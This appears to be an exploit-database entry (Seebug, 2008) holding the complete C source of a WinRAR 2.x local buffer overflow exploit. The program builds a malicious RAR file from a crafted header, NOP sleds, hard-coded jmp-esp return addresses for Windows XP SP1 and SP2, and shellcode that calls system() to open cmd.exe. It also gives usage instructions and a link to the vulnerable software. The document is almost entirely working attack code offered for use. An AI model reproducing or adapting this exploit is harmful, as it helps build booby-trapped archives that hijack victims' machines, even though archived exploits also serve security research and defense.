WinRAR 1.0 Local Buffer Overflow Exploit

2008-07-16T00:00:00
ID SSV:9093
Type seebug
Reporter Root
Modified 2008-07-16T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /*
* WinRar local buffer overflow exploit V1.0
* Coded By ATmaCA
* Copyright ? 2004 ProGroup Software, Inc.
* E-Mail:atmaca@prohack.net
* Web:www.prohack.net
* Usage:\\r\\nexploit <Target> <OutputPath>
* Targets:
* 1 - WinXP SP1 user32.dll [0x77D718FC]
* 2 - WinXP SP2 user32.dll [0x77D8AF0A]
* Example:exploit 1 myrar.rar
*/

/*
* All WinRar 2.x series are effected
* 3.x series not effected
* If you want to test and you do not have WinRar V2.x
* You can download it from http://atmaca.prorat.net/Src/winrar.zip
*/

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>

#ifdef __BORLANDC__
       #include <mem.h>
#endif

#define NOP 0x90

/*crafted rar header*/
char winrar_header[] =
\"\\x52\\x61\\x72\\x21\\x1A\\x07\\x00\\xCF\\x90\\x73\\x00\\x00\\x0D\\x00\\x00\\x00\"
\"\\x00\\x00\\x00\\x00\\x4A\\x91\\x74\\x80\\x80\\x35\\x00\\x00\\x00\\x00\\x00\\x00\"
\"\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x12\";

/*launch a local cmd.exe*/
char shellcode[]=
\"\\x68\"                    // push
\"cmd \"                    // cmd
\"\\x8B\\xC4\"                // mov eax,esp
\"\\x50\"                    // push eax
\"\\xB8\\xc7\\x93\\xC2\\x77\"    // mov eax,77C293C7 (address of system() on WinXP SP2
- msvcrt.dll)
\"\\xFF\\xD0\"                // call eax
;

char *target[]=  //return addr
{
       \"\\xFC\\x18\\xD7\\x77\",   //User32 jmp esp addr  WinXp Sp1
       \"\\x0A\\xAF\\xD8\\x77\"    //User32 jmp esp addr  WinXp Sp2
};

char *sysadrr[]=
{
       \"\\x44\\x80\\xC2\\x77\",   //77C28044 XP Sp1  msvcrt.dll system()
       \"\\xC7\\x93\\xC2\\x77\"    //77C293C7 XP Sp2  msvcrt.dll system()
};

FILE   *di;
int    targetnum;
int    i;

void main(int argc, char *argv[])
{

       if (argc < 3)
       {
                printf(\"\\r\\nWinRar local buffer overflow exploit V1.0\\r\\n\",
argv[0]);
                printf(\"Coded By ATmaCA\\r\\n\");
                printf(\"Copyright ? 2004 ProGroup Software, Inc.\\r\\n\");
                printf(\"E-Mail:atmaca@prohack.net\\r\\n\");
                printf(\"Web:www.prohack.net\\r\\n\\r\\n\");
                printf(\"Usage:\\r\\nexploit <Target>
<OutputPath>\\r\\n\\r\\n\",argv[0]);
                printf(\"Targets:\\n\");
                printf(\"1 - WinXP SP1 english user32.dll [0x77D718FC]\\n\");
                printf(\"2 - WinXP SP2 english user32.dll [0x77D8AF0A]\\n\");
                printf(\"Example:exploit 1 myrar.rar\\n\");

                return;
       }

       targetnum = atoi(argv[1]) - 1;

       if( (di=fopen(argv[2],\"wb\")) == NULL )
       {
               printf(\"Error opening file!\\n\");
               return;
       }
       for(i=0;i<sizeof(winrar_header)-1;i++)
               fputc(winrar_header[i],di);

       /*stuff in a couple of NOPs*/
       for(i=0;i<1051;i++)
               fputc(NOP,di);

       fprintf(di,\"%s\",target[targetnum]); //EIP

       for(i=0;i<50;i++) //NOPs
               fputc(NOP,di);

       memcpy(shellcode+9,sysadrr[targetnum],4); //system() addr

       /*Overwriting the return address (EIP) with JMP ESP address
       located somewhere in process space */
       for(i=0;i<sizeof(shellcode)-1;i++)
               fputc(shellcode[i],di);

       for(i=0;i<50;i++) //NOPs
               fputc(NOP,di);

       printf(\"Exploit rar file %s has been generated!\\n\",argv[2]);

       fclose(di);
}